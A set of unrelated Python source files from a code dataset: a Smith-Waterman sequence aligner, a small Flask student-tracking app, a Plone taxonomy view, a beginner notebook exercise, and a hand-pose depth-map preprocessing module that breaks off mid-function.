#bar_test_class_duration_by_duration(df, color_map, class_to_highlight)\n #percentiles(df) # deprecated\n # plot_num_test_methods_vs_duration(df, color_map)\n\n\nif __name__ == '__main__':\n 
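    # Example invocations, taken from the usage notes at the top of this module:
    #   python plotting_junit_report.py build/reports/tests/integrationTest/classes
    #   python plotting_junit_report.py build/reports/tests/integrationTest/classes my.kewl.MyTest
    # The optional second argument is the fully-qualified name of a test class to highlight in the bar charts.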
main()","sub_path":"plotting_junit_report.py","file_name":"plotting_junit_report.py","file_ext":"py","file_size_in_byte":11416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"566681064","text":"# implementation of smith-waterman sequence alignment\nimport numpy as np\n\n# Initialize Alignment Matrix\ndef initialize(query,target):\n \"\"\"\n Initializes the alignment matrix for the two input sequences. Query always\n goes across the top (columns), target goes vertically along the left (rows)\n\n Input: two strings to be aligned\n Output: the alignment matrix to operate on, of dimensions\n (query-length+1)rows x (target-length+1)cols, filled with\n 2-tuples of zeros (0,0) to hold (score,traceback_direction)\n \"\"\"\n # add 1 length for the gap option\n return np.zeros((len(query)+1,len(target)+1),dtype=(int,2))\n\n## ASCII EXAMPLE OF AN ALIGNMENT MATRIX\n# T-> j 0 1 2 3 4 <- char index aka row/col indices\n# * A A T G <- target sequence (starts with gap = *)\n# Q 0 * 0 0 0 0 0 <- this 0th row and col stay 0\n# | 1 A 0 5 5 0 2\n# V 2 T 0 0 5 9 5\n# i 3 G 0 0 1 5 18 <- maximum score=18, start traceback here\n\n[0, 0, 0, 0, 0],\n[0, 2, 2, 4, 4],\n[0, 4, 0, 0, 2],\n[0, 4, 1, 1, 0]\n\n# Compute Penalty Score for any Specific Gap\ndef compute_gap_penalty(gapSize,startChar,score_matrix):\n \"\"\"\n Computes the score for a gap of gapSize and starting with startChar.\n \"\"\"\n # one penalty value to open the gap, another value to continue the gap\n #return score_matrix[(startChar,'*')] + (gapSize)*score_matrix[('*','*')]\n # NOTE: had I been interpreting this wrong all along??? previously used ^^\n # but I think actually we aren't supposed to be able to get gap penalties\n # from the matrix itself?? I will store gap extension penalty in */*...\n return score_matrix[(startChar,'*')] - (gapSize)*score_matrix[('*','*')]\n\n\n## NOTE on computing scores:\n## Since SM algorithm restricts the lowest value for any cell to zero,\n## the two gap computation fns return at lowest -1, because\n## once their scores are below 0, they will not be the option chosen\n## for the overall value of the cell.\n\n# Compute the three score possibilities (match, gap in Q, gap in T)\ndef compute_match_score(row,col,queryChar,targetChar,align_matrix,score_matrix):\n \"\"\"\n Computes H_i,j + S(Q,T),\n the score of matching the current query and target chars plus the score of\n the best alignment of all preceeding characters once the current two chars\n are paired.\n Input: row and col (ints), query and target chars (string),\n align & score matrices\n Output: the score as an integer\n \"\"\"\n current_score = score_matrix[(queryChar,targetChar)]\n prev_score = align_matrix[row-1][col-1][0] #score is 1rst item in cell tuple\n # we get to assume that this is always filled in, because we initialize the\n # 0th row and column and always fill L->R top->bottom\n return current_score+prev_score\n\ndef compute_query_gap_score(row,col,queryChar,targetChar,align_matrix,score_matrix):\n \"\"\"\n Computes max( H_(i-k),j + gap_penalty*k, 0 global_max_score:\n global_max_score = max_score[0]\n global_max_score_coordinates = (r,c)\n\n align_matrix[r][c] = max_score\n\n return align_matrix,global_max_score,global_max_score_coordinates\n\n\ndef print_alignment(query,target):\n \"\"\"\n Pretty-prints out two aligned sequences, target on top and query below\n Input: query and target alignment sequences as strings\n Output: a 3-line string displaying the alignment. 
Ex:\n A A T G C G A T G\n | | | or | | | |\n - A T G C - A T G\n\n \"\"\"\n bridge = ''\n longer_seq = ''\n shorter_seq = ''\n longer = query if len(query) > len(target) else target\n shorter = target if query == longer else query\n for i in range(1,len(longer)+1):\n if i > len(shorter) or shorter[-i] == '*':\n shorter_seq = '- '+shorter_seq\n longer_seq = longer[-i]+' '+longer_seq\n bridge = ' '+bridge\n elif longer[-i] == '*':\n longer_seq = '- '+longer_seq\n shorter_seq = shorter[-i]+' '+shorter_seq\n bridge = ' '+bridge\n elif shorter[-i] == longer [-i]:\n shorter_seq = shorter[-i]+' '+shorter_seq\n longer_seq = longer[-i]+' '+longer_seq\n bridge = '| '+bridge\n else:\n shorter_seq = shorter[-i]+' '+shorter_seq\n longer_seq = longer[-i]+' '+longer_seq\n bridge = ' '+bridge\n query_seq = shorter_seq if shorter == query else longer_seq\n target_seq = longer_seq if longer == target else shorter_seq\n #yes there's an extra space at the end, but I'm fine with that\n return \"\\n\".join([target_seq,bridge,query_seq])\n\n# Decode a completely filled-in alignment matrix to return\n# the sequence and the score of the best alignment\ndef traceback(query,target,complete_align_matrix,max_score=0,max_coordinates=()):\n \"\"\"\n Trace back from highest scoring cell to a cell with a score of 0,\n recording the optimal sequence this path represents + its total score.\n Optionally can pass in the score and location of the highest scoring cell\n if it was recorded during the matrix-filling process.\n\n Input: filled-in alignment matrix (2D array of tuples, (score,direction),\n that correspond to the Smith-Waterman alignment calculations for the\n query and target sequences of that matrix. Optionally, the score\n coordinates (as an int and tuple) of the highest-value cell\n Output: the sequence and the score of the optimal alignment from the input\n matrix\n \"\"\"\n if max_coordinates: #if starting location not passed in, find it.\n for r in range(len(complete_align_matrix)):\n for c in range(len(complete_align_matrix[0])):\n if complete_align_matrix[r][c][0] > max_score:\n max_score = complete_align_matrix[r][c][0]\n max_coordinates = (r,c)\n\n row,col = max_coordinates\n current_cell = complete_align_matrix[row][col]\n score,direction = current_cell\n\n # Set variables for iteration\n query_align = ''\n target_align = ''\n queryChar = query[row-1]\n targetChar = target[col-1]\n\n # Walk path back through alignment matrix to a cell with score value 0\n timeout_counter = len(query)*len(target)+5 # to avoid endless loops\n while score > 0 and timeout_counter > 0:\n timeout_counter += -1\n # Build up the optimal alignment sequence, backwards\n #matrix has queryLen+1 rows and targetLen+1 cols, since both start at *\n target_align = targetChar + target_align\n query_align = queryChar + query_align\n # Determine which direction to go and then move\n if direction == 0: #match\n row,col = row-1,col-1\n queryChar = query[max(0,row-1)]\n targetChar = target[max(0,col-1)]\n if direction == 1: #gap in query\n row,col = row,col-1\n queryChar = '*'\n targetChar = target[max(0,col-1)]\n if direction == 2: #gap in target\n row,col = row-1,col\n queryChar = query[max(0,row-1)]\n targetChar = '*'\n score,direction = complete_align_matrix[row][col]\n\n # quick error handling\n if timeout_counter == 0:\n print(\"Row, Col, Location, Direction:\",row,col,current_cell,direction)\n print(\"Target:\",target)\n print(\"Query:\",query)\n print(\"Query Alignment, Target Alignment:\",query_align,target_align)\n raise 
RuntimeError(\"Traceback timed out, with state values shown above\")\n\n # otherwise, return the completed alignments\n return query_align,target_align,max_score\n\n# Algorithm Main Function\ndef align(query,target,score_matrix,do_traceback=True):\n \"\"\"\n Aligns two sequences via the Smith-Waterman algorithm, using the input\n scoring matrix to evaluate costs\n\n Input: query and target sequences as strings, a score matrix as a dictionary\n of tuples.\n Output: ASCII alignment depiction + alignment score\n \"\"\"\n #quick check to ensure that we have sequences to operate on\n if len(query) < 1 or len(target) < 1:\n raise ValueError(\"Query and target sequences cannot be empty.\\\n Received %s query and %s target.\" % (query,target))\n\n # Complete the alignment matrix\n matrix,score,best_cell = make_align_matrix(query,target,score_matrix)\n\n if do_traceback == False: # shortcut for analyses that only want score\n return score\n\n # Traceback to find alignments\n q_seq,t_seq,score = traceback(query,target,matrix,score,best_cell)\n return q_seq,t_seq,score\n\n\ndef rescore_alignment(query_align,target_align,score_matrix):\n \"\"\"\n Re-scores a static input alignment (query and target sequences) based on\n the input scoring matrix. Assumes no starting gap penalty.\n Input: query and target alignment sequences (post initial alignment),\n scoring matrix to rescore with\n Output: alignment score (int) according to the input score matrix\n \"\"\"\n score = 0\n shorter = query_align if len(query_align) < len(target_align) else target_align\n longer = target_align if shorter == query_align else query_align\n current_gap_s = 0\n current_gap_l = 0\n for i in range(0,len(shorter)+1): #go backwards b/c same way score was initially made\n sChar,lChar = shorter[-i],longer[-i]\n if current_gap_s > 0: #if currently in a gap in shorter\n if sChar == '*': #gap continues\n current_gap_s += 1\n else: # gap has ended, add gap extension penalties\n score += -1*current_gap_s*score_matrix[('*','*')]\n current_gap_s = 0 #reset to non-gap state\n elif current_gap_l > 0: #if currently in a gap in longer\n if lChar == '*':\n current_gap_l += 1\n else: # gap has ended, add gap extension penalties\n score += -1*current_gap_l*score_matrix[('*','*')]\n current_gap_l = 0 #reset to non-gap state\n else: # not currently in a gap\n if sChar == '*': #we have just then started a gap in shorter\n score += score_matrix[(sChar,'*')] #add gap opening penalty\n current_gap_s += 1\n elif lChar == '*': #we have just then started a gap in longer\n score += score_matrix[(sChar,'*')] #add gap opening penalty\n current_gap_l += 1\n else:\n score += max(0,score_matrix[(sChar,lChar)])\n #print(sChar,lChar,current_gap_s,current_gap_l,score)\n #print([ score_matrix[(shorter[i],longer[i])] for i in range(len(shorter)) ])\n return score\n","sub_path":"hw3/alignment/align.py","file_name":"align.py","file_ext":"py","file_size_in_byte":13940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"319251582","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nrating = input('enter an interger rating between 1 and 10')\n\n\n# In[2]:\n\n\ntype(rating)\n\n\n# In[38]:\n\n\nif grade >=90:\n print('congratulations your grade of 90 earns you an A in this Course')\n\n\n# In[39]:\n\n\ngrade = 90\n\n\n# In[57]:\n\n\nr=2\ndiameter=2*r\npi=3.14159\ncircumfrence=2*pi*r\narea=pi*r**2\n\n\n# In[51]:\n\n\n\n\n","sub_path":"Reading2 (Tariq Wise+ Justin Romero).py","file_name":"Reading2 (Tariq Wise+ Justin 
Romero).py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"161763588","text":"\"\"\"A web application for tracking projects, students, and student grades.\"\"\"\n\nfrom flask import Flask, request, render_template\n\nimport hackbright\n\napp = Flask(__name__)\n\n\n@app.route(\"/student\")\ndef get_student():\n \"\"\"Show information about a student.\"\"\"\n\n github = request.args.get('github')\n\n \n first, last, github = hackbright.get_student_by_github(github)\n\n # return \"{} is the GitHub account for {} {}\".format(github, first, last)\n proj_and_grades = hackbright.get_grades_by_github(github) \n\n # for item in proj_and_grades: *********review this later \n # project, grade = item\n\n html = render_template(\"student_info.html\",\n first=first,\n last=last,\n github=github,\n proj_and_grades=proj_and_grades)\n return html\n\n@app.route(\"/student-search\")\ndef get_student_form():\n \"\"\"Show form for searching for a student.\"\"\"\n\n return render_template(\"student_search.html\")\n\n\n@app.route(\"/student-add\")\ndef student_add():\n \"\"\"Add a student.\"\"\"\n return render_template(\"student_add.html\")\n\n\n@app.route(\"/student-added\", methods=['POST'])\ndef student_added():\n \"\"\"Add a student.\"\"\"\n\n fname = request.form.get(\"fname\")\n lname = request.form.get(\"lname\")\n github = request.form.get(\"github\")\n\n hackbright.make_new_student(fname, lname, github)\n\n return render_template(\"student_added.html\", first=fname, last=lname, github=github)\n\nif __name__ == \"__main__\":\n hackbright.connect_to_db(app)\n app.run(debug=True)\n","sub_path":"hackbright_web.py","file_name":"hackbright_web.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"632640080","text":"from Products.Five.browser import BrowserView\nfrom collective.taxonomy.interfaces import ITaxonomy\nfrom zope.component import getSiteManager\n\n\nclass TaxonomyView(BrowserView):\n\n def taxonomiesForContext(self, short_names=[]):\n results = []\n\n sm = getSiteManager()\n utilities = sm.getUtilitiesFor(ITaxonomy)\n for (utility_name, utility,) in utilities:\n short_name = utility.getShortName()\n\n if short_names and short_name not in short_names:\n continue\n\n if getattr(self.context, 'taxonomy_' + short_name, None):\n for taxon in getattr(self.context, 'taxonomy_' + short_name):\n results.append(self.translate(\n taxon,\n domain='collective.taxonomy.' 
+ short_name\n )\n )\n\n return results\n\n def translate(self, msgid, domain='', target_language=None):\n \"\"\" Eq to context.translate(msgid, domain) \"\"\"\n sm = getSiteManager()\n utility = sm.queryUtility(ITaxonomy, name=domain)\n return utility.translate(msgid, context=self.context, target_language=target_language)\n","sub_path":"src/collective/taxonomy/browser.py","file_name":"browser.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"338000601","text":"import os\nimport numpy as np\nimport sys\nimport struct\nfrom data.base_dataset import BaseDataset\nimport torch\nimport torch.utils.data as data\nfrom pyellipsoid import drawing\nimport cv2\nimport random\n\nCONNECTIONS = [ # [0, 1],\n [1, 2],\n [2, 3],\n [3, 4],\n # [0, 5],\n [5, 6],\n [6, 7],\n [7, 8],\n # [0, 9],\n [9, 10],\n [10, 11],\n [11, 12],\n # [0, 13],\n [13, 14],\n [14, 15],\n [15, 16],\n # [0, 17],\n [17, 18],\n [18, 19],\n [19, 20]]\n\n\ndef build_rotation_matrix(ax, ay, az, inverse=False):\n \"\"\"Build a Euler rotation matrix.\n Rotation order is X, Y, Z (right-hand coordinate system).\n Expected vector is [x, y, z].\n\n Arguments:\n ax {float} -- rotation angle around X (radians)\n ay {float} -- rotation angle around Y (radians)\n az {float} -- rotation angle around Z (radians)\n\n Keyword Arguments:\n inverse {bool} -- Do inverse rotation (default: {False})\n\n Returns:\n [numpy.array] -- rotation matrix\n \"\"\"\n\n if inverse:\n ax, ay, az = -ax, -ay, -az\n\n Rx = np.array([[1, 0, 0],\n [0, np.cos(ax), -np.sin(ax)],\n [0, np.sin(ax), np.cos(ax)]])\n\n Ry = np.array([[np.cos(ay), 0, np.sin(ay)],\n [0, 1, 0],\n [-np.sin(ay), 0, np.cos(ay)]])\n\n Rz = np.array([[np.cos(az), -np.sin(az), 0],\n [np.sin(az), np.cos(az), 0],\n [0, 0, 1]])\n\n R = np.dot(Rz, np.dot(Ry, Rx))\n\n return R\n\n\ndef make_ellipsoid_image(shape, center, radii, angle):\n \"\"\"Draw a 3D binary image containing a 3D ellipsoid.\n\n Arguments:\n shape {list} -- image shape [z, y, x]\n center {list} -- center of the ellipsoid [x, y, z]\n radii {list} -- radii [x, y, z]\n angle {list} -- rotation angles [x, y, z]\n\n Raises:\n ValueError -- arguments are wrong\n\n Returns:\n [numpy.array] -- image with ellipsoid\n \"\"\"\n\n if len(shape) != 3:\n raise ValueError('Only 3D ellipsoids are supported.')\n\n if not (len(center) == len(radii) == len(shape)):\n raise ValueError('Center, radii of ellipsoid and image shape have different dimensionality.')\n\n # Do opposite rotation since it is an axes rotation.\n angle = -1 * angle\n R = build_rotation_matrix(*angle)\n\n # Convert to numpy\n radii = np.array(radii)\n\n # Build a grid and get its points as a list\n xi = tuple(np.linspace(0, s - 1, s) - np.floor(0.5 * s) for s in shape)\n\n # Build a list of points forming the grid\n xi = np.meshgrid(*xi, indexing='ij')\n # points = np.array(list(zip(*np.vstack(list(map(np.ravel, xi))))))\n points = np.array(xi).reshape(3, -1)[::-1]\n\n # Reorder coordinates to match XYZ order and rotate\n # points = points[:, ::-1]\n # points = np.dot(R, points.T).T\n points = np.dot(R, points).T\n # Find grid center and rotate\n grid_center = np.array(center) - 0.5 * np.array(shape[::-1])\n grid_center = np.dot(R, grid_center)\n\n # Reorder coordinates back to ZYX to match the order of numpy array axis\n points = points[:, ::-1]\n grid_center = grid_center[::-1]\n radii = radii[::-1]\n\n # Draw the ellipsoid\n # dx**2 + dy**2 + dz**2 = r**2\n # dx**2 / r**2 + dy**2 / r**2 + 
dz**2 / r**2 = 1\n dR = (points - grid_center) ** 2\n dR = dR / radii ** 2\n # Sum dx, dy, dz / r**2\n nR = np.sum(dR, axis=1).reshape(shape)\n\n ell = (nR <= 1).astype(np.uint8)\n\n return ell.T # [:, ::-1]\n\n\ndef pixel2world(x, y, z, img_width, img_height, fx, fy):\n w_x = (x - img_width / 2) * z / fx\n w_y = (img_height / 2 - y) * z / fy\n w_z = z\n return w_x, w_y, w_z\n\n\ndef world2pixel(x, y, z, img_width, img_height, fx, fy):\n p_x = x * fx / z + img_width / 2\n p_y = img_height / 2 - y * fy / z\n uv = []\n for x, y in zip(p_x, p_y):\n uv.append([x, y])\n return uv\n\n\ndef depthmap2points(image, fx, fy):\n h, w = image.shape\n x, y = np.meshgrid(np.arange(w) + 1, np.arange(h) + 1)\n points = np.zeros((h, w, 3), dtype=np.float32)\n points[:, :, 0], points[:, :, 1], points[:, :, 2] = pixel2world(x, y, image, w, h, fx, fy)\n return points\n\n\ndef points2pixels(points, img_width, img_height, fx, fy):\n pixels = np.zeros((points.shape[0], 2))\n pixels[:, 0], pixels[:, 1] = \\\n world2pixel(points[:, 0], points[:, 1], points[:, 2], img_width, img_height, fx, fy)\n return pixels\n\n\ndef get_rotational_value(rf, randomRot, uv, img_width, img_height):\n \"\"\"\n Re-orientated the hand such that it is always up-right\n :param rf:\n :param randomRot:\n :param uv:\n :param img_width:\n :param img_height:\n :return:\n \"\"\"\n # ((0, 17), []),\n # ((17, 1), []),\n # ((1, 5), []),\n # ((5, 9), []),\n # ((9, 13), []),\n # ((13, 0), []),\n wrist = np.array(uv[0])\n palms = np.array([uv[1], uv[5], uv[9], uv[13]]).T # the palm excluding thumb\n palms = np.sum(palms, axis=1) / palms.shape[-1]# find centroid point\n\n center = np.array([img_height/2, img_width/2])\n wrist_norm = wrist - center\n palms_norm = palms - center\n A = (wrist - center) - (palms-center) # vector of hand coordinate\n upside_down = wrist[0] - palms[0] < 0\n\n\n A_norm = A / np.linalg.norm(A)\n B_norm = np.array([0, 1])\n theta = np.arccos(np.clip(np.dot(A_norm, B_norm), -1.0, 1.0))\n absdegree = np.rad2deg(theta)\n\n def direction(start, center , end):\n c = (start[0] - center[0])*(end[1]-center[1]) - (start[1]-center[1])*(end[0]-center[0])\n if c < 0:\n c = -1\n elif c > 0:\n c = 1\n else:\n c = 0\n return -1 * c\n\n c = direction(wrist, center, [center[0], center[1] + 1])\n if c <= -1:\n degree = c * absdegree\n else:\n degree = absdegree\n # if wrist_norm[0] > palms_norm[0]:\n # c = direction(wrist, center, [center[0], center[1]+1])\n # else:\n # c = direction(palms, center, [center[0], center[1]+1])\n\n return 0\n\n\ndef load_depthmap(filename, img_width, img_height, max_depth, crop_dim, randomRot, uv):\n with open(filename, mode='rb') as f:\n data = f.read()\n _, _, left, top, right, bottom = struct.unpack('I' * 6, data[:6 * 4])\n num_pixel = (right - left) * (bottom - top)\n cropped_image = struct.unpack('f' * num_pixel, data[6 * 4:])\n cropped_image = np.asarray(cropped_image).reshape(bottom - top, -1)\n depth_image = np.zeros((img_height, img_width), dtype=np.float32)\n depth_image[top:bottom, left:right] = cropped_image\n\n center, scale = xywh2cs(left, top, right - left, bottom - top, crop_dim, crop_dim)\n rf = 25\n uv = np.array(uv)\n rotation = get_rotational_value(rf, 0.5, uv, img_width, img_height)\n\n # print(f\"rotation level: {rotation}\")\n trans = get_affine_transformation(center,\n scale,\n rot=rotation,\n output_size=(crop_dim, crop_dim))\n depth_image[depth_image == 0] = max_depth\n depth_image = cv2.warpAffine(depth_image, trans, (crop_dim, crop_dim))\n depth_image[depth_image == 0] = max_depth\n\n 
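    # At this point depth_image is a crop_dim x crop_dim patch centered on the hand's
    # bounding box (background pixels filled with max_depth), and trans is the 2x3 affine
    # matrix produced by get_affine_transformation; __getitem__ later reuses trans to map
    # the joint uv coordinates into the same cropped frame via affine_transform().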
return depth_image, trans\n\n\ndef get_affine_transformation(center,\n scale,\n rot,\n output_size,\n shift=np.array([0, 0], dtype=np.float32),\n inv=0):\n if not isinstance(scale, np.ndarray) and not isinstance(scale, list):\n print(scale)\n scale = np.array([scale, scale])\n\n scale_tmp = scale * 200.0\n src_w = scale_tmp[0]\n dst_w = output_size[0]\n dst_h = output_size[1]\n\n rot_rad = np.pi * rot / 180\n src_dir = get_dir([0, src_w * -0.5], rot_rad)\n dst_dir = np.array([0, dst_w * -0.5], np.float32)\n\n src = np.zeros((3, 2), dtype=np.float32)\n dst = np.zeros((3, 2), dtype=np.float32)\n src[0, :] = center + scale_tmp * shift\n src[1, :] = center + src_dir + scale_tmp * shift\n dst[0, :] = [dst_w * 0.5, dst_h * 0.5]\n dst[1, :] = np.array([dst_w * 0.5, dst_h * 0.5]) + dst_dir\n\n src[2:, :] = get_3rd_point(src[0, :], src[1, :])\n dst[2:, :] = get_3rd_point(dst[0, :], dst[1, :])\n\n if inv:\n trans = cv2.getAffineTransform(np.float32(dst), np.float32(src))\n else:\n trans = cv2.getAffineTransform(np.float32(src), np.float32(dst))\n\n return trans\n\n\ndef get_3rd_point(a, b):\n direct = a - b\n return b + np.array([-direct[1], direct[0]], dtype=np.float32)\n\n\ndef get_dir(src_point, rot_rad):\n sn, cs = np.sin(rot_rad), np.cos(rot_rad)\n\n src_result = [0, 0]\n src_result[0] = src_point[0] * cs - src_point[1] * sn\n src_result[1] = src_point[0] * sn + src_point[1] * cs\n\n return src_result\n\n\ndef xywh2cs(x, y, w, h, img_width, img_height):\n center = np.zeros((2), dtype=np.float32)\n center[0] = x + w * 0.5\n center[1] = y + h * 0.5\n aspect_ratio = img_width * 1. / img_height\n pixel_std = 200\n if w > aspect_ratio * h:\n h = w * 1.0 / aspect_ratio\n elif w < aspect_ratio * h:\n w = h * aspect_ratio\n scale = np.array(\n [w * 1.0 / pixel_std, h * 1.0 / pixel_std],\n dtype=np.float32)\n if center[0] != -1:\n scale = scale * 1.25\n\n return center, scale\n\n\ndef discretize(coord, cropped_size):\n '''[-1, 1] -> [0, cropped_size]'''\n min_normalized = -1\n max_normalized = 1\n scale = (max_normalized - min_normalized) / cropped_size\n return (coord - min_normalized) / scale\n\n\ndef warp2continuous(coord, refpoint, cubic_size, cropped_size):\n '''\n Map coordinates in set [0, 1, .., cropped_size-1] to original range [-cubic_size/2+refpoint, cubic_size/2 + refpoint]\n '''\n min_normalized = -1\n max_normalized = 1\n\n scale = (max_normalized - min_normalized) / cropped_size\n coord = coord * scale + min_normalized # -> [-1, 1]\n\n coord = coord * cubic_size / 2 + refpoint\n\n return coord\n\n\ndef scattering(coord, cropped_size):\n # coord: [0, cropped_size]\n # Assign range[0, 1) -> 0, [1, 2) -> 1, .. [cropped_size-1, cropped_size) -> cropped_size-1\n # That is, around center 0.5 -> 0, around center 1.5 -> 1 .. 
around center cropped_size-0.5 -> cropped_size-1\n coord = coord.astype(np.int32)\n\n mask = (coord[:, 0] >= 0) & (coord[:, 0] < cropped_size) & \\\n (coord[:, 1] >= 0) & (coord[:, 1] < cropped_size) & \\\n (coord[:, 2] >= 0) & (coord[:, 2] < cropped_size)\n\n coord = coord[mask, :]\n\n cubic = np.zeros((cropped_size, cropped_size, cropped_size))\n\n # Note, directly map point coordinate (x, y, z) to index (i, j, k), instead of (k, j, i)\n # Need to be consistent with heatmap generating and coordinates extration from heatmap\n cubic[coord[:, 0], coord[:, 1], coord[:, 2]] = 1\n\n return cubic\n\n\ndef extract_coord_from_output(output, center=True):\n '''\n output: shape (batch, jointNum, volumeSize, volumeSize, volumeSize)\n center: if True, add 0.5, default is true\n return: shape (batch, jointNum, 3)\n '''\n assert (len(output.shape) >= 3)\n vsize = output.shape[-3:]\n\n output_rs = output.reshape(-1, np.prod(vsize))\n max_index = np.unravel_index(np.argmax(output_rs, axis=1), vsize)\n max_index = np.array(max_index).T\n\n xyz_output = max_index.reshape([*output.shape[:-3], 3])\n\n # Note discrete coord can represents real range [coord, coord+1), see function scattering()\n # So, move coord to range center for better fittness\n if center: xyz_output = xyz_output + 0.5\n\n return xyz_output\n\n\ndef generate_coord(points, refpoint, new_size, angle, trans, sizes):\n cubic_size, cropped_size, original_size = sizes\n\n # points shape: (n, 3)\n coord = points\n\n # note, will consider points within range [refpoint-cubic_size/2, refpoint+cubic_size/2] as candidates\n\n # normalize\n coord = (coord - refpoint) / (cubic_size / 2) # -> [-1, 1]\n # print(f\"refpoint: {refpoint}\")\n # print(f\"coord: {coord}\")\n\n # discretize\n coord = discretize(coord, cropped_size) # -> [0, cropped_size]\n coord += (original_size / 2 - cropped_size / 2) # move center to original volume\n # print(f\"coord norm: {coord}\")\n\n # resize around original volume center\n resize_scale = new_size / 100\n if new_size < 100:\n coord = coord * resize_scale + original_size / 2 * (1 - resize_scale)\n elif new_size > 100:\n coord = coord * resize_scale - original_size / 2 * (resize_scale - 1)\n else:\n # new_size = 100 if it is in test mode\n pass\n\n # rotation\n if angle != 0:\n original_coord = coord.copy()\n original_coord[:, 0] -= original_size / 2\n original_coord[:, 1] -= original_size / 2\n coord[:, 0] = original_coord[:, 0] * np.cos(angle) - original_coord[:, 1] * np.sin(angle)\n coord[:, 1] = original_coord[:, 0] * np.sin(angle) + original_coord[:, 1] * np.cos(angle)\n coord[:, 0] += original_size / 2\n coord[:, 1] += original_size / 2\n\n # translation\n # Note, if trans = (original_size/2 - cropped_size/2), the following translation will\n # cancel the above translation(after discretion). 
It will be set it when in test mode.\n coord -= trans\n\n return coord\n\n\ndef generate_cubic_input(points, refpoint, new_size, angle, trans, sizes):\n _, cropped_size, _ = sizes\n coord = generate_coord(points, refpoint, new_size, angle, trans, sizes)\n\n # scattering\n cubic = scattering(coord, cropped_size)\n\n return cubic\n\n\ndef generate_cubic_hand(keypoints, refpoint, new_size, angle, trans, sizes):\n _, cropped_size, _ = sizes\n coord = generate_coord(keypoints, refpoint, new_size, angle, trans, sizes)\n\n # scattering\n cubic = scattering(coord.copy(), cropped_size)\n\n # adding shape\n # centers = []\n # raddis = []\n for i, j in CONNECTIONS:\n j1, j2 = coord[i], coord[j]\n\n r_x = abs(j1[0] - j2[0])\n r_y = abs(j1[1] - j2[1])\n r_z = abs(j1[2] - j2[2])\n d = np.sqrt(r_x ** 2 + r_y ** 2 + r_z ** 2)\n\n rot = np.deg2rad([80, 30, 20])\n\n c_x = abs(j1[0] - j2[0]) / 2 + min(j1[0], j2[0])\n c_y = abs(j1[1] - j2[1]) / 2 + min(j1[1], j2[1])\n c_z = abs(j1[2] - j2[2]) / 2 + min(j1[2], j2[2])\n\n # centers.append((c_x, c_y, c_z))\n\n cubic += make_ellipsoid_image(cubic.shape, (c_x, c_y, c_z), [d / 2.5] * 3, rot)\n cubic = (cubic >= 1).astype(np.float32)\n return cubic\n\n\ndef generate_heatmap_gt(keypoints, refpoint, new_size, angle, trans, sizes, d3outputs, pool_factor, std):\n _, cropped_size, _ = sizes\n d3output_x, d3output_y, d3output_z = d3outputs\n\n coord = generate_coord(keypoints, refpoint, new_size, angle, trans, sizes) # [0, cropped_size]\n coord /= pool_factor # [0, cropped_size/pool_factor]\n\n # heatmap generation\n output_size = int(cropped_size / pool_factor)\n heatmap = np.zeros((keypoints.shape[0], output_size, output_size, output_size))\n\n # use center of cell\n center_offset = 0.5\n\n for i in range(coord.shape[0]):\n xi, yi, zi = coord[i]\n heatmap[i] = np.exp(-(np.power((d3output_x + center_offset - xi) / std, 2) / 2 + \\\n np.power((d3output_y + center_offset - yi) / std, 2) / 2 + \\\n np.power((d3output_z + center_offset - zi) / std, 2) / 2))\n\n return heatmap\n\n\ndef affine_transform(pt, t):\n new_pt = np.array([pt[0], pt[1], 1.]).T\n new_pt = np.dot(t, new_pt)\n return new_pt[:2]\n\n\ndef generate_jointsmap(uv_coord, depth, width, height, channel=3):\n canvas = np.zeros((height, width))\n bones = [\n ((17, 18), [130] * channel),\n ((18, 19), [140] * channel),\n ((19, 20), [150] * channel),\n\n ((1, 2), [10] * channel),\n ((2, 3), [20] * channel),\n ((3, 4), [30] * channel),\n\n ((5, 6), [40] * channel),\n ((6, 7), [50] * channel),\n ((7, 8), [60] * channel),\n\n ((9, 10), [70] * channel),\n ((10, 11), [80] * channel),\n ((11, 12), [90] * channel),\n\n ((13, 14), [100] * channel),\n ((14, 15), [110] * channel),\n ((15, 16), [120] * channel),\n\n ((0, 17), []),\n ((0, 1), []),\n ((0, 5), []),\n ((0, 9), []),\n ((0, 13), [])\n ]\n palm = []\n for connection, _ in [((0, 17), []),\n ((17, 1), []),\n ((1, 5), []),\n ((5, 9), []),\n ((9, 13), []),\n ((13, 0), []), ]:\n coord1 = uv_coord[connection[0]]\n palm.append([int(coord1[0]), int(coord1[1])])\n # palm.append([int((coord1[0]-.5)* W_scale+ W_offset ), int(-(coord1[1]- .5)* H_scale+ H_offset)])\n # print(palm)\n palm_colors = [depth[0], depth[17], depth[1], depth[5], depth[9], depth[13]]\n palm_colors = list(filter(lambda x: x >= 0, palm_colors))\n # if len(palm_colors) == 6:\n # binary_mask = np.zeros((height, width))\n # cv2.fillConvexPoly(binary_mask, np.array([palm], dtype=np.int32), 1)\n #\n # avg_color_upper = np.average(palm_colors[2::])\n # avg_color_lower = np.average(palm_colors[::2])\n #\n # Xs, Ys 
